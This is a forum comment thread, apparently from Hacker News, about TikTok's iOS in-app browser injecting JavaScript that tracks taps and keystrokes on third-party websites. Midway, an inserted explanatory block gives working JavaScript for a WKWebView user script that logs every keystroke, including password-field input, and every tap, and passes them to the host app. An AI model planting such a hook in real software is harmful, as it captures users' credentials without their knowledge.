
I can’t quite figure this out: it sounds like if you click a link in someone’s TikTok content, the in-app browser can read any text entered on that site using the in-app browser. Does just not entering any keyboard input in the in-app browser mitigate this?

Does Apple Lockdown help in this situation? I thought that typical TikTok use just involved scrolling and watching video content. Are users who only view content subject to this security flaw?

Thanks in advance for any clarification.

Also, off topic but doesn’t YouTube’s “Shorts” take the place of TikTok? I have my Google privacy settings set so YouTube can store my viewing history for one month so I get reasonable recommendations. Does TikTok have similar settings?



They do a lot more than that.

> TikTok iOS subscribes to every tap on any button, link, image or other component on websites rendered inside the TikTok app.

> TikTok iOS uses a JavaScript function to get details about the element the user clicked on, like an image (document.elementFromPoint)

And that's just a sample of the calls the author was able to find.


This seems perfectly reasonable btw. The extension to the in-app browser existing and logging non-TikTok browsing is troublesome.

Perhaps Apple should ban in-app browsers? But what about Safari? Apple itself collects and benefits from Safari data for its ad product


If I build an analytics company and build a product that my customers can use to "analyze" their users' activity, it'd almost be total negligence on my end not to include common tracking mechanisms that are well documented, like simple event hooks in JS. I really don't get the rage against TikTok.

What they do that is publicly known is not bad. Maybe there is something bad they're doing but these random HN top stories are not it. If NSA/US govt really wants us to avoid tiktok it needs better convincing than "omg they're stealing the x,y of your finger when you tap on an image."


You're writing as if this is just analytics tracking a user's actions in their own UI. It's not! This is tracking actions users take, and data users enter, on 3rd-party websites.

That is not "what happens in TikTok's app," as you put it in your reply. It may be hosted "in" the app in a technical sense, but the typical user who is fullscreen viewing a totally different website may not feel like they are "in" the app at all. I wouldn't bet that most users even get that there's a distinction between an in-app browser vs. opening a tab in the main OS browser (on Android at least, the back gesture takes you back to the app either way). Users almost certainly don't expect the original app to be able to read passwords and other text that they type on those 3rd-party sites.


And how do we know Instagram and Yelp are not doing something similar? If you have an in-app browser you can track user activity much more invasively. That’s not an argument against TikTok, that’s an argument against in-app browsers. If you’re so concerned with user privacy, ask Apple to remove that functionality from all apps instead of slyly picking and choosing the apps to attack.


Instagram does do the same thing afaik


If you sold a phone that sent call details back to the manufacturer you’d likely get locked up.

TikTok is not a party to these communications, and they’re not a carrier or service provider. What they’re doing is wiretapping.


TikTok is not a browser and has zero obligation to provide private communications. What you do inside TikTok's app is quite literally TikTok's business.


But when you click a link in the TikTok app, TikTok opens an in-app browser for you to view it in - and that’s where it’s gathering all the information. It’s a deceptive practice, since most users won’t realize that they’re not simply surfing a website as usual.


Not only that, but per the article, TikTok is the only popular app that does this while not providing an option to open the link in a regular browser from within the built-in one.


This is just an idiotic statement. Almost all social media apps do this. In addition, apps like Yelp do this to the detriment of business owners.


Did you just wake up today after reading this article and learn about the existence of in-app browsers? This is a common practice by almost all social media apps.


You are aware of the various privacy laws in a lot of countries?


Unfortunately, the issue of consent is extremely muddy as it's easy to argue that the average person is not informed enough about the issue at hand, and so they have improperly developed expectations when engaging with the TikTok browser.

Lack of consent and lack of transparency, make this whole thing pretty messed up.


surely slurping up passwords at least seems ominous?


What happens in the TikTok app is very much TikTok's business and their IP.

Are you possibly conflating TikTok tracking its own users within its app with it somehow gaining access to the OS itself and tracking users at that level? That is clearly not happening as far as what is publicly known, as much as stories like this want you to believe it to be the case.


It makes sense when you’re a slick lawyer appealing to technicalities, but in reality users don’t know how their devices work and where the borders of an app are. If TikTok was a restaurant, we would be talking about its restroom surveillance here. It may not collect overly private information like passwords or messages, but the doubt is reasonable.


Would you consider it right for a browser to snoop on every page opened, every link clicked, every character typed and send it to the cloud without informing the user?


No, my point is why single out TikTok when every other social app is doing the same exact thing, for all we know, in their in-app browsers. Just because the researcher in this particular article happened to go after TikTok?


Why not use an example if you know they are doing it, if you don’t have time to look up what all the others are doing? It’s a pretty weak defense that everyone else is doing the same wrong thing.


It's not a defense, I'm simply asking why everyone is piling on TikTok over some JavaScript trickery just because they're deemed an enemy of the state by our almighty government?


Apple exposes two ways to use an in-app browser. One is a legacy method that gives you full control, the other gives the user a sandboxed browser with no interference from the app.

TikTok isn't the only app abusing this. Instagram and Facebook will both do sneaky things like respond to the content of the page you're browsing (asking to save passwords in their own private keychain, showing context specific information, etc.)

-

You're not exposed to any of these if you don't open a link inside the in-app browser.

The most common reason to click a link in their in-app browser is an ad... so obviously TikTok, Instagram and Facebook are using the in-app browser to track your interactions after the ad click and sell the data


There is a difference between tracking activities (bad enough) and reading everything you type.


People really want to force outrage on this, but after enough interaction with the ad (scrolling, clicking, typing) TikTok asks about your experience with the ad.

TikTok is not pretending to have opened your system browser, it goes very far in doing the opposite:

- Hides the normal browser UI

- Replaces every page load with a TikTok spinner

- Permanently places a TikTok header bar over the screen with a report content button tied to TikTok

Combine that with the fact so many people seem to not realize... the only links you can open with the browser are links sold with analytics (ie you can't post arbitrary links as a user commenting) and the outrage just doesn't add up.

A completely non-technical user going through that flow would expect that they're still in TikTok and are using TikTok not their browser


Apple needs to give us power-users the option to decide whether to load such web contents (in apps) in either SFSafariViewController (sandboxed) or WKWebView (fully exposed). This is especially critical when, for example, payment processors load your net banking portal inside apps (a common mode of online payment in India) - unless it is sandboxed, the app and / or payment processor has complete access to your netbanking credentials.
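The two comments above describe the split between the sandboxed SFSafariViewController and the fully exposed WKWebView, and the comment near the top quotes the hooks the researcher found (tap subscriptions, `document.elementFromPoint`, keystroke capture). The block below is an added illustration, not TikTok's script and not code from the article: it reconstructs the shape of a user script an app can inject into a WKWebView (for example via `WKUserScript`) and shows why a password field is indistinguishable from any other input once such a script is in place. The message-handler name `tracker`, the `FakeDocument` stand-in and the "hunter2" login page are all constructed for the example so it runs under Node without a browser.

```javascript
// Added example: what an injected user script inside a WKWebView can observe on a
// third-party page. Not TikTok's code; a reconstruction of the capability the thread
// describes. SFSafariViewController exposes no hook like this to the host app.

// Summarise the element under the user's finger or cursor. Nothing here redacts
// <input type="password">: a naive hook records it like any other field.
function describeElement(el) {
  if (!el) return null;
  return {
    tag: el.tagName,
    id: el.id || null,
    inputType: el.type || null,
    text: (el.textContent || '').slice(0, 40),
  };
}

// Turn one DOM event into the record the native side would receive. For clicks,
// elementFromPoint resolves the tapped coordinates to an element; that is the call
// quoted upthread.
function buildRecord(doc, ev) {
  const base = { type: ev.type, at: ev.timeStamp };
  if (ev.type === 'keydown') {
    return { ...base, key: ev.key, target: describeElement(ev.target) };
  }
  if (ev.type === 'click') {
    const el = doc.elementFromPoint(ev.clientX, ev.clientY);
    return { ...base, x: ev.clientX, y: ev.clientY, target: describeElement(el) };
  }
  return base;
}

// Attach capture-phase listeners on the document so the hook fires before any of the
// page's own handlers and cannot be stopped by them. `sink` receives every record.
function install(doc, sink) {
  const handler = (ev) => sink(buildRecord(doc, ev));
  doc.addEventListener('keydown', handler, true);
  doc.addEventListener('click', handler, true);
  return handler;
}

// In a real WKWebView the sink is the native bridge: window.webkit.messageHandlers.<name>.
// The handler name `tracker` is an assumption for this example.
function nativeSink() {
  const bridge = typeof window !== 'undefined' && window.webkit && window.webkit.messageHandlers;
  if (bridge && bridge.tracker) return (rec) => bridge.tracker.postMessage(rec);
  return (rec) => console.log(JSON.stringify(rec));
}

// Constructed stand-in for a document so the file runs offline under Node.
class FakeDocument {
  constructor(elements) { this.elements = elements; this.listeners = {}; }
  addEventListener(type, fn) { (this.listeners[type] = this.listeners[type] || []).push(fn); }
  elementFromPoint(x, y) {
    return this.elements.find((e) => x >= e.x && x < e.x + e.w && y >= e.y && y < e.y + e.h) || null;
  }
  dispatch(ev) { (this.listeners[ev.type] || []).forEach((fn) => fn(ev)); }
}

// Constructed login page: the user types a password, then taps the submit button.
// Returns the records the injected script would have shipped to the native side.
function demo() {
  const password = { tagName: 'INPUT', id: 'pw', type: 'password', textContent: '', x: 0, y: 0, w: 200, h: 40 };
  const submit = { tagName: 'BUTTON', id: 'login', type: 'submit', textContent: 'Sign in', x: 0, y: 50, w: 200, h: 40 };
  const doc = new FakeDocument([password, submit]);
  const records = [];
  install(doc, (rec) => records.push(rec));
  for (const key of 'hunter2') doc.dispatch({ type: 'keydown', key, target: password, timeStamp: 0 });
  doc.dispatch({ type: 'click', clientX: 10, clientY: 60, timeStamp: 1 });
  return records;
}

if (typeof document !== 'undefined') install(document, nativeSink());
else demo().forEach((r) => console.log(JSON.stringify(r)));
```

Run under Node and the output is seven keystroke records carrying the password characters and a click record resolved to the `login` button. The point for a practitioner is that the page being visited cannot opt out of this: the script runs in the page's own JavaScript context, so the only effective mitigation is the one the comments ask for, rendering the page in a view the host app cannot script.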


>> Does just not entering any keyboard input in the in app browser mitigate this?

Yes, but I doubt the hundreds of millions of users, many of whom are children, know this.


To play devil's advocate... the most common way to end up in the in-app browser is to click an ad.

Non-technical people don't have a concept of "in app browser sandboxing". In their minds they clicked on an ad, they're still inside TikTok, TikTok's UI is showing, TikTok will show prompts based on the content shown... they probably assume TikTok has access to that page?

Honestly I'm more annoyed that Apple allows big apps to use the loophole that is the legacy webview than I am that TikTok uses that webview to do the exact single thing it's good for... having full control over the web content you're showing in app.


How do you know that's the most common way?

Because I doubt it is. People click links in chats and in their feeds way more than they click ads


That is completely wrong since most users cannot post a website link (hotlink if I need to spell that out...), let alone in a comment.

The only way for a non-ad link to be opened from comments is to copy it and paste it in your native browser.

Business accounts get a special link field that's part of their bio, so again, deeply embedded in TikTok... and those behave exactly like the ads do. TikTok has a permanent "Flag" UI on top of the site, they replace every page load with a TikTok spinner

As expected half the people outraged don't even know what they're outraged about.


It's ironic how you were being condescending when you used the term hotlink ("if I need to spell it out...") and yet used the term incorrectly


Ironic that you latch onto a completely inconsequential mistake to divert from the fact you had no idea what you were talking about.


I just didn't feel like further arguing.

In that guy's other comment he was talking about Meta/Facebook too which is what I'm most familiar with and was primarily referring to about people clicking on links.

Even with TikTok I bet people click on profile links more than ads

Also that's not ironic, maybe you are thinking of another word


The entire thread from the parent is about TikTok.

And "you bet" wrong, since the profile links are only enabled for business accounts.

But you're right about one thing: it was not at all ironic that you'd deflect. It's exactly what I'd expect after someone misses what a thread is about and makes assumptions about a subject they don't know.

That was what some people call sarcasm.


I know they are only enabled for accounts that get some particular amount of views. But there are a lot of those accounts

You were the one who brought up Facebook first in your other comment...



